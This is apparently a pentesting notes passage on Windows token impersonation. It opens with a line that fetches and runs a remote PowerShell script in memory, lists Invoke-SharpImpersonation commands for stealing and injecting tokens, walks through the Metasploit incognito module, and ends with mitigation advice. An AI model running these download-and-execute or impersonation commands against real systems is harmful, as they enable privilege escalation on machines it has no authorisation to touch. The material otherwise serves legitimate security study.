Load into memory
```
IEX (IWR -usebasicparsing https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpImpersonation.ps1)
```
# List current tokens on system
Invoke-SharpImpersonation -Command "list"
Invoke-SharpImpersonation -Command "list wmi"
# Attempt to impersonate user with first process found
Invoke-SharpImpersonation -Command "user:<Domain\User>"
# Impersonate in current thread
Invoke-SharpImpersonation "user:<Domain\User> technique:ImpersonateLoggedOnUser"
# Inject directly into a process ID
Invoke-SharpImpersonation -Command "pid:<PID>"
# Impersonate first process of target user to a custom binary path
Invoke-SharpImpersonation -Command "user:<Domain\User> binary:<binary-Path>"
Invoke-SharpImpersonation -Command "user:<Domain\User> binary:powershell.exe"
Invoke-SharpImpersonation -Command "user:<Domain\User> binary:cmd.exe"
# List all running processes and users natively
Get-Process -IncludeUserName | Select UserName, ProcessName, ID | Sort UserName
## Scenario
In this scenario we will be using Metasploit. This scenario assumes we already have gained shell access on the target system as the user 'Bart.Simpson'.
In Metasploit we can load the incognito module with the command `load incognito`. This will load the modules required to impersonate another users token. Once loaded we can use the `help` command to show if the module has loaded and what options are available to us.
We can then list the available tokens for users with the `list_tokens -u` command.
In the example below we will attempt to load the 'NT AUTHORITY\SYSTEM' token. with the command:
```
impersonate_token
```
Tokens will persist until a machine has been rebooted. Below I have rebooted the target machine and logged in as the user 'Lisa.Simpson'. I then exploited the machine and viewed available tokens. As we can see we have less available to us now that the machine has been rebooted.
### **Rev2self**
The `meterpreter` command Rev2self can be used to revert to the original user token.
## Token Types
#### Delegation
Are generally created when a user logs on interactively to the target system. Delegation tokens can be used elsewhere on the network.
#### Impersonation
Impersonation tokens run in an alternative security context to the process that started it. These tokens are generally not used elsewhere on the network.
***
{% hint style="info" %}
Due to the fact that tokens persist until reboot. Servers and File Servers are a potential treasure troves for tokens.
{% endhint %}
## Mitigation
* Limit permissions so that users and user groups cannot create tokens. This setting should be defined for the local system account only. GPO: Computer Configuration > \[Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Create a token object. Also define who can create a process level token to only the local and network service through GPO: Computer Configuration > \[Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Replace a process level token.
* Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command `runas`.
* An adversary must already have administrator level access on the local system to make full use of this technique; be sure to restrict users and accounts to the least privileges they require.
## Further Reading:
**Analysis of Access Token Theft and Manipulation:**